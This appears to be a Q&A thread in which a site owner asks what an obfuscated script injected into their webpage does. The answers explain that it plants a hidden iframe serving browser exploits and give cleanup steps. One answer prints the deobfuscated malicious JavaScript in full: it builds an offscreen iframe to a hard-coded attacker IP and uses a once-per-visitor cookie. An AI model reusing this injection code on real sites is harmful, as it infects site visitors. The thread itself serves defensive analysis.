# Need help deciphering malicious JS code

Tags: javascript

was hoping someone could give me a hand with deciphering this obfuscated Javascript added to a webpage that I own. As the code is quite large I will just link to pastebin posts but I can add them to the post itself if needed. I'm not quite sure of the best practises and etiquette in regards to posting malicious code so please let me know if this is incorrect.

Here is the code after running it through a JS pretty print tool:
http://pastebin.com/8YA0j7Av

I did manage to decode the hex array from the above code into this:
http://pastebin.com/kKwLetXh

Can anyone enlighten me on what exactly this code is doing? And the best way to avoid it happening again in the future?

Thanks!

Answer (score 3, accepted):

It adds an iframe to your page which points to some browser exploits to infect anyone viewing your site. It then sets a cookie which tells it not to try again, so it only puts the iframe on the page the first time you access it (which makes it somewhat less obtrusive).

The usual way these get added to your files is that you leaked your password for admin access to the server, after getting infected by browser exploits yourself. In that case the course of action is (1) scan all client machines that have accessed the site (with multiple AVs, as AVs are unreliable); any infected machines should be reinstalled from scratch (AV removal is very unreliable); (2) change passwords; (3) if you are using FTP, stop doing that; (4) back up any data, wipe the server, restore code from known good backup/source control.

Other types of compromise are possible (eg vulnerable web app deployed—check your logs for suspicious access and ensure all applications are updated), but FTP account credential compromise is the most common source of this kind of intrusion today.

Answer (score 2):

Here is the source code for study.  I added some comments and renamed variables.  The source for the iframe is either inactive or only sends an exploit conditionally.  I was unable to access it using a proxy, or directly with a non-browser tool.  It's possible it could be filtering user agents, possible targeting old IE, or certain mobile phones.

It appears to be encoded by an inexperienced user with a tool, because it doesn't obfuscate variables inside the hex string which would add an additional layer of obfuscation, and reduce size.  Also, eval rarely appears in plain text.

```
function loadFrame() {
    var static = 'ajax';
    var controller = 'index.php';
    var iframe = document.createElement('iframe');

    // set the source to some evil script
    // it may use client detection, as all I can see is &nbsp;
    iframe.src = 'http://64.78.1.202/tM9c7bCK.php';
    iframe.style.position = 'absolute';
    iframe.style.color = '563';
    iframe.style.height = '563px';
    iframe.style.width = '563px';
    iframe.style.left = '1000563';
    iframe.style.top = '1000563';

    // if the frame doesn't already exist load it
    if (!document.getElementById('hmbl')) {
        document.write('<p id=\'hmbl\' class=\'loadFrame\' ></p>');
        document.getElementById('hmbl').appendChild(iframe);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires="
        + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {
    } else {
        SetCookie('visited_uq', '55', '1', '/');

        loadFrame();
    }
}
```

Comment: Thanks. I would upvote this for the extra information but I do not have enough rep yet :p